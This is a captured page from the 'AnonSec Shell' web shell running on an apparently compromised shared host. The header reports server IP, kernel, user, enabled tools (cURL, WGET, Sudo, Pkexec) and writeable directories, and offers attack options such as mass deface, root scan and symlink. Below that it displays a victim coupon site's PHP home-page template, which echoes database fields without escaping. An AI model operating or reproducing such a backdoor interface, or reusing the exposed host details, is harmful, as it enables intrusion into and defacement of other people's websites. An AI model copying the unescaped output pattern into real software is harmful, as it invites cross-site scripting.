AnonSec Shell
Server IP : 144.76.79.100  /  Your IP : 216.73.216.103   [ Reverse IP ]
Web Server : Apache
System : Linux ch05.wehostwebserver.com 5.14.0-611.5.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Nov 11 08:09:09 EST 2025 x86_64
User : razzlestore ( 1092)
PHP Version : 8.2.29
Disable Function : NONE
Domains : 343 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/public_html/application/views/front/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /home/public_html/application/views/front/home.php
<style>
    @media only screen and (min-width: 768px) {
  .hero-area.bg-1.text-center {
    height:800px;
  }
}
</style>
<section class="hero-area bg-1 text-center" style="background:url(<?php echo base_url('uploads/homepage/'.$homepage_data->homepage_banner_image);?>) center no-repeat;background-size: cover;    background-color: rgba(0, 0, 0, 0.45);background-blend-mode: overlay;">



	<div class="container">
		<div class="row">
			<div class="col-md-12">
				<div class="content-block">
				    <?php if(!empty($homepage_data->homepage_banner_content)):?>
				    <?php echo $homepage_data->homepage_banner_content;?>
				    <?php endif;?>
				</div>
			</div>
		</div>
	</div>
</section>
<?php $store_categories = array();?>
<?php if(!empty($stores_data)):?>
<section class="clients-slider-wrapper section pb-0">
    <div class="container">
        <div class="row">
            <div class="col-md-12">
                <div class="clients-slider owl-carousel owl-theme">
                    <?php foreach($stores_data as $store):?>
                    <div class="item">
                        <a href="<?php echo base_url($store['store_slug']);?>">
                            <img src="<?php echo base_url('uploads/store/').$store['store_logo'];?>" alt="<?php echo $store['store_name'];?> Logo">
                        </a>
                    </div>
                    <?php endforeach;?>
                </div>
            </div>
        </div>
    </div>
</section>
<?php endif;?>
<section class="popular-deals popular-deals-grid section">
	<div class="container">
		<div class="row">
			<div class="col-md-12">
				<div class="section-title">
				    <?php if(!empty($homepage_data->homepage_first_section_heading)):?>
					<h2><?php echo $homepage_data->homepage_first_section_heading;?></h2>
					<?php endif;?>
				</div>
			</div>
		</div>
		<div class="row offers-row">
		    <?php foreach($popularoffers_data as $offer):?>
			<div class="col-sm-12 col-lg-4 mb-15">
                <div class="deal-item bg-light">
                	<div class="media">
                		<div class="img-content align-self-center">
                			<a href="<?php echo base_url($offer['store_slug']);?>">
                				<img src="<?php echo base_url('uploads/store/').$offer['store_logo'];?>" alt="<?php echo $offer['store_name'];?> Logo">
                			</a>
                		</div>
                		<div class="media-body">
                			<h5 class="mt-0"><?php echo $offer['offer_title'];?></h5>
                			<ul class="list-inline">
                                <li>
                                    <a data-affliate-url="<?php echo $offer['offer_affiliate_url'];?>" href="#offer_<?php echo $offer['offer_id'];?>" class="btn btn-dual btn-<?php echo $offer['offer_type'];?> offer-btn"><span class="upper"><?php echo ($offer['offer_type'] == 'code')?'Show Code':'Get Deal';?></span><?php if($offer['offer_type'] == 'code'):?><span class="lower"><?php echo 'code'.substr($offer['offer_code'], -4);?></span><?php endif;?></a>
                                </li>

                				<li class="list-inline-item"><a href="#"><?php echo ($offer['offer_expiry_date_days_left'] < 0)?'Offer Expired':'Offer will expire in '.$offer['offer_expiry_date_days_left'].' days';?></a>
                				</li>
                                <ul class="success-list list-inline align-content-center">
                                    <li class="list-inline-item text-muted"> <?php echo $offer['offer_views'];?> views</li>
                                    <?php if($offer['offer_verified'] == '1'):?>
                                    <li class="list-inline-item success"><i class="fa fa-check"></i> Verified</li>
                                    <?php endif;?>
                                    <?php if($offer['offer_exclusive'] == '1'):?>
                                    <li class="list-inline-item success"><i class="fa fa-diamond"></i> Exclusive</li>
                                    <?php endif;?>
                                </ul>                				
                			</ul>
                		</div>
                	</div>
                </div>
            </div>
            <?php endforeach;?>
		</div>
	</div>
</section>
<!--<section class="clients-slider-wrapper section pb-0 cat-slider">-->
<!--    <div class="container">-->
<!--		<div class="row">-->
<!--			<div class="col-md-12">-->
<!--				<div class="section-title">-->
<!--				    <?php if(!empty($homepage_data->homepage_second_section_heading)):?>-->
<!--					<h2><?php echo $homepage_data->homepage_second_section_heading;?></h2>-->
<!--					<?php endif;?>-->
<!--				</div>-->
<!--			</div>-->
<!--		</div>        -->
		
<!--        <div class="row">-->
<!--            <div class="col-md-12">-->
<!--                <div class="cats-slider owl-carouselz">-->
<!--                    <?php foreach($categories_data as $store):?>-->
<!--                    <div class="item cat-box-single">-->
<!--                        <a href="<?php echo base_url('category/'.$store['category_slug']);?>">-->
<!--                            <?php if(!empty($store['category_icon'])):?>-->
<!--                            <img src="<?php echo base_url('uploads/category/').$store['category_icon'];?>" alt="<?php echo $store['category_name'];?>-icon">-->
<!--                            <?php endif;?>-->
<!--                            <p><?php echo $store['category_name'];?></p>-->
<!--                        </a>-->
<!--                    </div>-->
<!--                    <?php endforeach;?>-->
<!--                </div>-->
<!--            </div>-->
<!--        </div>-->
<!--    </div>-->
<!--</section>-->
<section class="clients-slider-wrapper section pb-0">
    <div class="container">
        <div class="row">
            <div class="col-md-12">
                <div class="clients-slider owl-carousel owl-theme">
                    <?php foreach($categories_data as $store):?>
                    <div class="item">
                         <a  href="<?php echo base_url('category/'.$store['category_slug']);?>">
                            <?php if(!empty($store['category_icon'])):?>
                            <img style="width:85px; height:50px;" src="<?php echo base_url('uploads/category/').$store['category_icon'];?>" alt="<?php echo $store['category_name'];?>-icon">
                            <?php endif;?>
                            <br>
                            <br>
                            <br>
                            <center>
                                                           <p ><?php echo $store['category_name'];?></p>
 
                            </center>
                        </a>
                    </div>
                    <?php endforeach;?>
                </div>
            </div>
        </div>
    </div>
</section>
<!--<section class="home-third hidden-xs">-->
<!--    <div class="container">-->
<!--        <a target="_blank" href="<?php echo $homepage_data->homepage_third_section_image_link;?>">-->
              <!--<img src="<?php echo base_url('assets/front/img/photoslider1.jpg');?>" alt="<?php echo $offer['store_name'];?>-logo">-->
            <!--<div style="height:<?php echo $homepage_data->homepage_third_section_image_height;?>px;background:url(<?php echo base_url('uploads/homepage/'.$homepage_data->homepage_third_section_image);?>) center no-repeat;background-size: cover;"></div>-->
<!--            <div style="height:<?php echo $homepage_data->homepage_third_section_image_height;?>px;background:url(<?php echo base_url('uploads/homepage/'.$homepage_data->homepage_third_section_image);?>) center no-repeat;background-size: cover;"></div>-->
        
<!--        </a>-->
<!--    </div>-->
<!--</section>-->
<section class="popular-deals section">
	<div class="container">
		<div class="row">
			<div class="col-md-12">
				<div class="section-title">
				    <?php if(!empty($homepage_data->homepage_fourth_section_heading)):?>
					<h2><?php echo $homepage_data->homepage_fourth_section_heading;?></h2>
					<?php endif;?>
				</div>
			</div>
		</div>
		<div class="row offers-row">
		    <?php foreach($offers_data as $offer):?>
			<div class="col-sm-12 col-lg-6">
                <div class="deal-item bg-light">
                	<div class="media">
                		<div class="img-content align-self-center">
                			<a href="<?php echo base_url($offer['store_slug']);?>">
                			  
                				<img src="<?php echo base_url('uploads/store/').$offer['store_logo'];?>" alt="<?php echo $offer['store_name'];?>-logo">
                			</a>
                		</div>
                		<div class="media-body">
                			<h5 class="mt-0"><?php echo $offer['offer_title'];?></h5>
                			<ul class="list-inline">
                                <li>
                                    <a data-affliate-url="<?php echo $offer['offer_affiliate_url'];?>" href="#offer_<?php echo $offer['offer_id'];?>" class="btn btn-dual btn-<?php echo $offer['offer_type'];?> offer-btn"><span class="upper"><?php echo ($offer['offer_type'] == 'code')?'Show Code':'Get Deal';?></span><?php if($offer['offer_type'] == 'code'):?><span class="lower"><?php echo 'code'.substr($offer['offer_code'], -4);?></span><?php endif;?></a>
                                </li>
                                <li class="list-inline-item"><a href="#"><?php echo ($offer['offer_expiry_date_days_left'] < 0)?'Offer Expired':'Offer will expire in '.$offer['offer_expiry_date_days_left'].' days';?></a>
                				</li>
                                <ul class="success-list list-inline align-content-center">
                                    <li class="list-inline-item text-muted"> <?php echo $offer['offer_views'];?> views</li>
                                    <?php if($offer['offer_verified'] == '1'):?>
                                    <li class="list-inline-item success"><i class="fa fa-check"></i> Verified</li>
                                    <?php endif;?>
                                    <?php if($offer['offer_exclusive'] == '1'):?>
                                    <li class="list-inline-item success"><i class="fa fa-diamond"></i> Exclusive</li>
                                    <?php endif;?>
                                </ul>                				
                			</ul>
                		</div>
                	</div>
                </div>
            </div>
            <?php endforeach;?>
		</div>
	</div>
</section>
<?php if(!empty($homepage_data->homepage_content)):?>
<section class="section  pb-50">
	<div class="container">
		<div class="row">
			<div class="col-md-12">
			    <?php echo $homepage_data->homepage_content;?>
			</div>
		</div>
	</div>
</section>
<?php endif;?>

Anon7 - 2022
AnonSec Team